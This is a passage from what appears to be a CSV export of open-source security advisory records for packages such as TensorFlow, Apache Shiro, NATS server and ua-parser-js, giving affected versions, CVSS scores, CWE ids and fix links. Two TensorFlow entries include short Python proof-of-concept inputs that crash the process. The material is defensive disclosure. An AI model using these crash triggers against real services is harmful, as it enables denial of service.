'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m34j-p8rj-wjxq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29546'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/67784700869470d65d5f2ef20aeb5e97c31673cb'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:45:01Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-ph87-fvjr-v33w,2021-05-18T19:46:06Z,2021-05-21T14:25:05Z,,['CVE-2021-29563'],CHECK-fail in `tf.raw_ops.RFFT`,"### Impact +An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from the implementation of `tf.raw_ops.RFFT`: + +```python +import tensorflow as tf + +inputs = tf.constant([1], shape=[1], dtype=tf.float32) +fft_length = tf.constant([0], shape=[1], dtype=tf.int32) + +tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) +``` + +The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination. + +### Patches +We have patched the issue in GitHub commit [31bd5026304677faa8a0b77602c6154171b9aec1](https://github.com/tensorflow/tensorflow/commit/31bd5026304677faa8a0b77602c6154171b9aec1). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-ph87-fvjr-v33w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29563'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/31bd5026304677faa8a0b77602c6154171b9aec1'}]","{'cwe_ids': ['CWE-617'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:46:06Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-78cj-fxph-m83p,2021-03-24T23:33:16Z,2021-05-06T16:11:13Z,,['CVE-2021-27292'],Regular Expression Denial of Service (ReDoS) in ua-parser-js,"ua-parser-js >= 0.7.14, fixed in 0.7.24, uses a regular expression which is vulnerable to denial of service. If an attacker sends a malicious User-Agent header, ua-parser-js will get stuck processing it for an extended period of time.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.14'}, {'fixed': '0.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27292'}, {'type': 'WEB', 'url': 'https://github.com/faisalman/ua-parser-js/commit/809439e20e273ce0d25c1d04e111dcf6011eb566'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/commit/2e7e8c4a7b318f4032493773732754e418279a14'}, {'type': 'WEB', 'url': 'https://gist.github.com/b-c-ds/6941d80d6b4e694df4bc269493b7be76'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T20:23:57Z', 'nvd_published_at': '2021-03-17T13:15:00Z'}" +1.4.0,GHSA-75qf-wgfj-v652,2023-09-14T19:21:08Z,2021-05-18T18:28:03Z,,['CVE-2020-7669'],github.com/u-root/u-root/pkg/tarutil Arbitrary File Write via Archive Extraction (Zip Slip),This affects all versions up to and including version 7.0.0 of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/u-root/u-root/pkg/tarutil'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '7.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7669'}, {'type': 'WEB', 'url': 'https://github.com/u-root/u-root/pull/1817'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUROOTUROOTPKGTARUTIL-570428'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:02:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-72w9-fcj5-3fcg,2022-05-04T01:54:57Z,2021-05-07T15:53:10Z,,['CVE-2020-11989'],Improper Authentication in Apache Shiro,"Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11989'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shiro'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T20:07:20Z', 'nvd_published_at': '2020-06-22T19:15:00Z'}" +1.4.0,GHSA-p45v-v4pw-77jr,2021-05-18T21:30:45Z,2021-05-21T14:23:34Z,,['CVE-2021-29548'],Division by 0 in `QuantizedBatchNormWithGlobalNormalization`,"### Impact +An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`: + +```python +import tensorflow as tf + +t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) +t_min = tf.constant(-10.0, dtype=tf.float32) +t_max = tf.constant(-10.0, dtype=tf.float32) +m = tf.constant([], shape=[0], dtype=tf.quint8) +m_min = tf.constant(-10.0, dtype=tf.float32) +m_max = tf.constant(-10.0, dtype=tf.float32) +v = tf.constant([], shape=[0], dtype=tf.quint8) +v_min = tf.constant(-10.0, dtype=tf.float32) +v_max = tf.constant(-10.0, dtype=tf.float32) +beta = tf.constant([], shape=[0], dtype=tf.quint8) +beta_min = tf.constant(-10.0, dtype=tf.float32) +beta_max = tf.constant(-10.0, dtype=tf.float32) +gamma = tf.constant([], shape=[0], dtype=tf.quint8) +gamma_min = tf.constant(-10.0, dtype=tf.float32) +gamma_max = tf.constant(-10.0, dtype=tf.float32) + +tf.raw_ops.QuantizedBatchNormWithGlobalNormalization( + t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max, + v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min, + beta_max=beta_max, gamma=gamma, gamma_min=gamma_min, + gamma_max=gamma_max, out_type=tf.qint32, + variance_epsilon=0.1, scale_after_normalization=True) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc) does not validate all constraints specified in the [op's contract](https://www.tensorflow.org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization). + +### Patches +We have patched the issue in GitHub commit [d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b](https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p45v-v4pw-77jr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29548'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:30:45Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-jhj6-5mh6-4pvf,2021-10-06T21:44:05Z,2021-05-24T17:00:46Z,,['CVE-2020-26213'],Denial-of-Service within Docker container,"### Impact +If you run teler inside a Docker container and encounter `errors.Exit` function, it will cause denial-of-service (`SIGSEGV`) because it doesn't get process ID and process group ID of teler properly to kills. + +### Patches +Upgrade to the >= 0.0.1 version. + +### Workarounds +N/A + +### References +- https://github.com/kitabisa/teler/commit/ec6082049dba9e44a21f35fb7b123d42ce1a1a7e + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Issues Section](https://github.com/kitabisa/teler/issues) +* Email us at [infosec@kitabisa.com](mailto:infosec@kitabisa.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'ktbs.dev/teler/pkg/errors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kitabisa/teler/security/advisories/GHSA-jhj6-5mh6-4pvf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26213'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler/commit/ec6082049dba9e44a21f35fb7b123d42ce1a1a7e'}, {'type': 'PACKAGE', 'url': 'https://github.com/kitabisa/teler'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:09:36Z', 'nvd_published_at': '2020-11-06T17:15:00Z'}" +1.4.0,GHSA-wmwp-pggc-h4mj,2023-02-07T21:20:12Z,2021-05-18T15:30:30Z,,['CVE-2019-19619'],Cross-site Scripting in Documize,domain/section/markdown/markdown.go in Documize before 3.5.1 mishandles untrusted Markdown content. This was addressed by adding the bluemonday HTML sanitizer to defend against XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/documize/community'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19619'}, {'type': 'WEB', 'url': 'https://github.com/documize/community/commit/a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/documize/community'}, {'type': 'WEB', 'url': 'https://github.com/documize/community/compare/v3.5.0...v3.5.1'}, {'type': 'WEB', 'url': 'https://github.com/documize/community/releases/tag/v3.5.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0086'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:29:00Z', 'nvd_published_at': None}" +1.4.0,GHSA-h3p9-wrgx-82cm,2023-09-29T15:41:15Z,2021-05-18T18:18:50Z,,['CVE-2019-19316'],Use of a Broken or Risky Cryptographic Algorithm in Terraform,"When using the Azure backend with a shared access signature (SAS), Terraform versions prior to 0.12.17 may transmit the token and state snapshot using cleartext HTTP. + +### Specific Go Packages Affected +github.com/hashicorp/terraform/backend/remote-state/azure","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/terraform'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.17'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hashicorp/terraform/security/advisories/GHSA-4rvg-555h-r626'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19316'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/terraform/issues/23493'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/terraform/commit/6db3cf8e5b4cfb2a3cd1d99a813b50b2d5d363bb'}]","{'cwe_ids': ['CWE-20', 'CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T15:15:38Z', 'nvd_published_at': '2019-12-02T21:15:00Z'}" +1.4.0,GHSA-j756-f273-xhp4,2023-08-30T18:08:21Z,2021-05-21T16:22:20Z,,[],github.com/nats-io/nats-server/ Import token permissions checking not enforced,"(This advisory is canonically ) + +## Problem Description + +The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. + +The JWT library's validation of the bindings in the Import Token incorrectly warned on mismatches, instead of outright rejecting the token. + +As a result, any account can take an Import token used by any other account and re-use it for themselves because the binding to the importing account is not rejected, and use it to import *any* Subject from the Exporting account, not just the Subject referenced in the Import Token. + +The NATS account-server system treats account JWTs as semi-public information, such that an attacker can easily enumerate all account JWTs and retrieve all Import Tokens from those account JWTs. + +The CVE identifier should cover the JWT library repair and the nats-server containing the fixed JWT library, and any other application depending upon the fixed JWT library. + + +## Affected versions + +#### JWT library + + * all versions prior to 2.0.1 + * fixed after nats-io/jwt#149 landed (2021-03-14) + +#### NATS Server + + * Version 2 prior to 2.2.0 + + 2.0.0 through and including 2.1.9 are vulnerable + * fixed with nats-io/nats-server@423b79440c (2021-03-14) + + +## Impact + +In deployments with untrusted accounts able to update the Account Server with imports, a malicious account can access any Subject from an account which provides Exported Subjects. + +Abuse of this facility requires the malicious actor to upload their tampered Account JWT to the Account Server, providing the service operator with a data-store which can be scanned for signs of abuse. + + +## Workaround + +Deny access to clients to update their account JWT in the account server. + + +## Solution + +Upgrade the JWT dependency in any application using it. + +Upgrade the NATS server if using NATS Accounts (with private Exports; Account owners can create those at any time though). + +Audit all accounts JWTs to scan for exploit attempts; a Python script to audit the accounts can be found at .","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/nats-server/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/jwt'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3-0.20210314221642-a826c77dc9d2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/jwt/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/security/advisories/GHSA-j756-f273-xhp4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3127'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/jwt/pull/149'}, {'type': 'WEB', 'url': 'https://advisories.nats.io/CVE/CVE-2021-3127.txt'}]","{'cwe_ids': ['CWE-755', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:01:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-2cf2-2383-h4jv,2021-07-28T18:46:07Z,2021-05-07T16:16:43Z,,['CVE-2020-7600'],Improperly Controlled Modification of Dynamically-Determined Object Attributes in querymen,"querymen prior to 2.1.4 allows modification of object properties. The parameters of exported function handler(type, name, fn) can be controlled by users without any sanitization. This could be abused for Prototype Pollution attacks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'querymen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7600'}, {'type': 'WEB', 'url': 'https://github.com/diegohaz/querymen/commit/1987fefcb3b7508253a29502a008d5063a873cef'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-QUERYMEN-559867'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T19:11:22Z', 'nvd_published_at': '2020-03-12T23:15:00Z'}" +1.4.0,GHSA-j4rw-x3vg-c8r7,2021-05-05T18:40:32Z,2021-05-06T18:12:37Z,,['CVE-2020-7721'],Prototype Pollution in node-oojs,All versions of package node-oojs up to and including version 1.4.0 are vulnerable to Prototype Pollution via the setPath function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-oojs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7721'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEOOJS-598678'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:40:32Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-74xm-qj29-cq8p,2023-08-29T23:21:14Z,2021-05-25T18:42:42Z,,['CVE-2021-28681'],"In github.com/pion/webrtc, failed DTLS certificate verification doesn't stop data channel communication","### Impact +Data channel communication was incorrectly allowed with users who have failed DTLS certificate verification. + +This attack requires +* Attacker knows the ICE password. +* Only take place during PeerConnection handshake. + +This attack can be detected by monitoring `PeerConnectionState` in all versions of Pion WebRTC. + +### Patches +Users should upgrade to v3.0.15. + +The exact patch is https://github.com/pion/webrtc/commit/545613dcdeb5dedb01cce94175f40bcbe045df2e + +### Workarounds +Users should listen for when `PeerConnectionState` changes to `PeerConnectionStateFailed`. When it enters this state users should not continue using the PeerConnection. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/pion/webrtc +* Email us at [team@pion.ly](mailto:team@pion.ly) + +Thank you to https://github.com/Gaukas for discovering this.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pion/webrtc/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.15'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pion/webrtc/security/advisories/GHSA-74xm-qj29-cq8p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28681'}, {'type': 'WEB', 'url': 'https://github.com/pion/webrtc/issues/1708'}, {'type': 'WEB', 'url': 'https://github.com/pion/webrtc/pull/1709'}, {'type': 'WEB', 'url': 'https://github.com/pion/webrtc/commit/545613dcdeb5dedb01cce94175f40bcbe045df2e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pion/webrtc'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0104'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:29:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-gmq2-39ff-f5qg,2021-05-21T14:40:36Z,2021-05-21T16:25:48Z,,[],A failed upgrade may lead to hung goroutines,"### Impact +Processes using tableflip may encounter hung goroutines in the parent process, after a failed upgrade. + +The Go runtime has annoying behaviour around setting and clearing +O_NONBLOCK: exec.Cmd.Start() ends up calling os.File.Fd() for any +file in exec.Cmd.ExtraFiles. os.File.Fd() disables both the use +of the runtime poller for the file and clears O_NONBLOCK from +the underlying open file descriptor. + +This can lead to goroutines hanging in a parent process, after at least +one failed upgrade. The bug manifests in goroutines which rely on +either a deadline or interruption via Close() to be unblocked being stuck +in read or accept like syscalls. As far as I can tell we've not experienced +this problem in production, so it's most likely quite rare. + +### Patches +The problem has been fixed in v1.2.2. + +### Workarounds +None. + +### References +* https://github.com/cloudflare/tableflip/commit/cae714b289e199db5da5f08af861ea65be6232c0",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/tableflip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.2.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/tableflip/security/advisories/GHSA-gmq2-39ff-f5qg'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/tableflip/commit/cae714b289e199db5da5f08af861ea65be6232c0'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T14:40:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-qw5h-7f53-xrp6,2021-05-17T21:22:43Z,2021-05-21T14:28:45Z,,['CVE-2021-29615'],Stack overflow in `ParseAttrValue` with nested tensors,"### Impact +The implementation of [`ParseAttrValue`](https://github.com/tensorflow/tensorflow/blob/c22d88d6ff33031aa113e48aa3fc9aa74ed79595/tensorflow/core/framework/attr_value_util.cc#L397-L453) can be tricked into stack overflow due to recursion by giving in a specially crafted input. + +### Patches +We have patched the issue in GitHub commit [e07e1c3d26492c06f078c7e5bf2d138043e199c1](https://github.com/tensorflow/tensorflow/commit/e07e1c3d26492c06f078c7e5bf2d138043e199c1). + +The fix will be included in TensorFlow 2.5.0. We will also 